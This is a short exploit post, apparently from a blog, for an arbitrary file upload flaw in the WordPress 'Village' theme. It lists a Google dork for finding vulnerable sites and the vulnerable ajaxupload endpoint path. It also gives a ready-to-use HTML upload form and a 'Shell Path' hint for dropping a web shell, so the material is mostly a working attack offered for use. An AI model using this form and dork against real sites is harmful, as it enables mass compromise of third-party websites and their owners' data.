WordPress Village theme Arbitary File Upload



#- Title: WordPress Village theme Arbitary File Upload
#- Author: -
#- Date: 2014
#- Developer : ThemeProvince
#- Link Download : themeforest .net/item/village-a-responsive-fullscreen-wordpress-theme/237812
#- Google Dork: inurl:"/themes/village/"
#- Fixed in Version : -
#- Tested on : Windows 
======================================================


-- Proof Of Concept --
When Vuln :
{"error":"No files were uploaded."}

CSRF : 

<form enctype="multipart/form-data"
action="site .com/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php" method="post">
Your File: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

Shell Path : Here
Saya tidak meminta satu rupiah pun dari anda, Tolong hargai Copyright konten yang ditulis oleh Admin, Jika ingin Copy-Paste tolong sertakan link sumber. Terimakasih :)
Open My Youtube Channel
Previous
Next Post »
Thanks for your comment